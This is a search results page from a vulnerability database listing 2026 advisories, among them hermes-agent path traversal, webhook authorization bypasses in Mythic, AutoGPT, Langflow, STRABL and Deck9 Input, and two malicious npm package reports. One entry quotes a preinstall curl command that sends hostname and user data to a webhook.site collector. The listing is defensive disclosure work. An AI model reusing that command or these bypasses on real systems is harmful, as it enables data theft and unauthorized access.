Lucene search
K

184 matches found

NVD
NVD
added 2026/07/04 1:16 p.m.9 views

CVE-2026-14628

A vulnerability was detected in NousResearch hermes-agent up to 2026.5.16. This impacts the function extractmedia of the file gateway/platforms/base.py of the component Live Webhook Endpoint. Performing a manipulation results in path traversal. The attack may be initiated remotely. The exploit is...

6.9CVSS0.00551EPSS
Exploits1References5
Cvelist
Cvelist
added 2026/07/04 1:0 p.m.39 views

CVE-2026-14628 NousResearch hermes-agent Live Webhook Endpoint base.py extract_media path traversal

A vulnerability was detected in NousResearch hermes-agent up to 2026.5.16. This impacts the function extractmedia of the file gateway/platforms/base.py of the component Live Webhook Endpoint. Performing a manipulation results in path traversal. The attack may be initiated remotely. The exploit is...

6.9CVSS0.00551EPSS
Exploits1References5
ATTACKERKB
ATTACKERKB
added 2026/07/04 1:0 p.m.8 views

CVE-2026-14628

A vulnerability was detected in NousResearch hermes-agent up to 2026.5.16. This impacts the function extractmedia of the file gateway/platforms/base.py of the component Live Webhook Endpoint. Performing a manipulation results in path traversal. The attack may be initiated remotely. The exploit is...

6.9CVSS5.8AI score0.00551EPSS
Exploits1References5Affected Software1
EUVD
EUVD
added 2026/07/04 1:0 p.m.9 views

EUVD-2026-41673

A vulnerability was detected in NousResearch hermes-agent up to 2026.5.16. This impacts the function extractmedia of the file gateway/platforms/base.py of the component Live Webhook Endpoint. Performing a manipulation results in path traversal. The attack may be initiated remotely. The exploit is...

6.9CVSS5.8AI score0.00551EPSS
Exploits1References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/30 8:59 p.m.12 views

Malicious code in @sudoughnym/enviro-demo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 02c1c204d0f458d13d7140f4b7a007d551095665a418e9146037be9a5b2b7957 @sudoughnym/[email protected] ships preinstall.js and postinstall.js lifecycle scripts that run automatically on npm install. Both scripts collect...

5.8AI score
Exploits0References2
NVD
NVD
added 2026/06/29 6:16 p.m.12 views

CVE-2026-57953

Mythic before 3.4.0.60 contains an authorization bypass vulnerability that allows authenticated spectator-role users to perform unauthorized write operations by accessing the eventingimportautomaticwebhook endpoint registered under spectator-permitted middleware. Attackers with spectator role can...

5.4CVSS0.00249EPSS
Exploits0References4
Cvelist
Cvelist
added 2026/06/29 5:21 p.m.32 views

CVE-2026-57953 Mythic < 3.4.0.60 - Unauthorized Automation Workflow Modification via eventing_import_automatic_webhook Endpoint

Mythic before 3.4.0.60 contains an authorization bypass vulnerability that allows authenticated spectator-role users to perform unauthorized write operations by accessing the eventingimportautomaticwebhook endpoint registered under spectator-permitted middleware. Attackers with spectator role can...

5.4CVSS0.00249EPSS
Exploits0References4
ATTACKERKB
ATTACKERKB
added 2026/06/29 5:21 p.m.5 views

CVE-2026-57953

Mythic before 3.4.0.60 contains an authorization bypass vulnerability that allows authenticated spectator-role users to perform unauthorized write operations by accessing the eventingimportautomaticwebhook endpoint registered under spectator-permitted middleware. Attackers with spectator role can...

5.4CVSS5.8AI score0.00249EPSS
Exploits0References5
Positive Technologies
Positive Technologies
added 2026/06/29 12:0 a.m.11 views

PT-2026-53671

Name of the Vulnerable Software and Affected Versions Mythic versions prior to 3.4.0.60 Description An authorization bypass exists that allows authenticated users with the spectator role to perform unauthorized write operations. This occurs because the 'eventing import automatic webhook' endpoint...

5.4CVSS6AI score0.00249EPSS
Exploits0References9
ATTACKERKB
ATTACKERKB
added 2026/06/26 4:2 p.m.8 views

CVE-2026-56823

AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Prior to , the POST /api/integrations/webhooks/webhookid/ping endpoint fetches the target webhook by primary key alone without verifying that the webhook belongs to the...

5.4CVSS5.9AI score0.0015EPSS
Exploits0References2Affected Software1
CVE
CVE
added 2026/06/22 2:10 p.m.15 views

CVE-2026-7664

Summary: IBM Langflow OSS versions 1.0.0–1.8.4 are affected by an unauthenticated access issue due to improper authorization enforcement on the Streamable MCP transport endpoint, potentially allowing access to protected MCP project resources and execution of MCP operations. Affected products/vers...

9.8CVSS5.9AI score0.00277EPSS
Exploits0References1Affected Software1
Cvelist
Cvelist
added 2026/06/22 2:10 p.m.35 views

CVE-2026-7664 Unauthenticated Flow Execution via Webhook Endpoint in Langflow OSS

IBM Langflow OSS 1.0.0 through 1.8.4 could allow unauthenticated attackers to access protected MCP project resources and execute MCP operations due to improper authorization enforcement in the Streamable MCP transport endpoint...

9.8CVSS0.00277EPSS
Exploits0References1
IBM Security Bulletins
IBM Security Bulletins
added 2026/06/21 3:51 p.m.3 views

Security Bulletin: Unauthenticated Flow Execution via Webhook Endpoint in Langflow OSS

Summary Langflow OSS POST /api/v1/webhook/flowid executes any user's flow without authentication by default. Setting WEBHOOKAUTHENABLE defaults to False in auth configuration. When False, webhook handler calls getuserbyflowidorendpointname and trusts caller unconditionally with no credential chec...

9.8CVSS5.9AI score0.00277EPSS
Exploits0Affected Software1
Cvelist
Cvelist
added 2026/06/19 6:51 a.m.35 views

CVE-2026-3640 STRABL <= 4.5 - Unauthenticated Arbitrary Webhook Creation via REST API Endpoint

The STRABL – A checkout solution plugin for WordPress is vulnerable to Missing Authentication in all versions up to and including 4.5. The plugin registers a REST API webhook endpoint at /wp-json/strabl/webhook/order with a permissioncallback of returntrue, which allows all incoming requests...

5.3CVSS0.00382EPSS
Exploits0References14
EUVD
EUVD
added 2026/06/19 6:51 a.m.11 views

EUVD-2026-37995

The STRABL – A checkout solution plugin for WordPress is vulnerable to Missing Authentication in all versions up to and including 4.5. The plugin registers a REST API webhook endpoint at /wp-json/strabl/webhook/order with a permissioncallback of returntrue, which allows all incoming requests...

5.3CVSS5.8AI score0.00382EPSS
Exploits0References14
CVE
CVE
added 2026/06/19 6:51 a.m.18 views

CVE-2026-3640

The STRABL WordPress plugin (versions

5.3CVSS5.8AI score0.00382EPSS
Exploits0References14
EUVD
EUVD
added 2026/06/15 9:30 p.m.10 views

EUVD-2026-36773

Incorrect access control in the /form/webhooks/webhook endpoint of Deck9 Input v2.0.1 allows authenticated attackers to arbitrarily modify or delete another tenant's webhook via a crafted request...

5.2AI score0.00282EPSS
Exploits0References2
NVD
NVD
added 2026/06/15 8:16 p.m.10 views

CVE-2026-50875

Incorrect access control in the /form/webhooks/webhook endpoint of Deck9 Input v2.0.1 allows authenticated attackers to arbitrarily modify or delete another tenant's webhook via a crafted request...

8.1CVSS0.00282EPSS
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 8:8 p.m.12 views

Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

5.3AI score
Exploits0References1
Positive Technologies
Positive Technologies
added 2026/06/15 12:0 a.m.16 views

PT-2026-49316

Name of the Vulnerable Software and Affected Versions Deck9 Input version 2.0.1 Description Incorrect access control in the "/form/webhooks/webhook" endpoint allows authenticated attackers to arbitrarily modify or delete webhooks belonging to other tenants by sending a crafted request...

8.1CVSS5.9AI score0.00282EPSS
Exploits0References4
Rows per page
Query Builder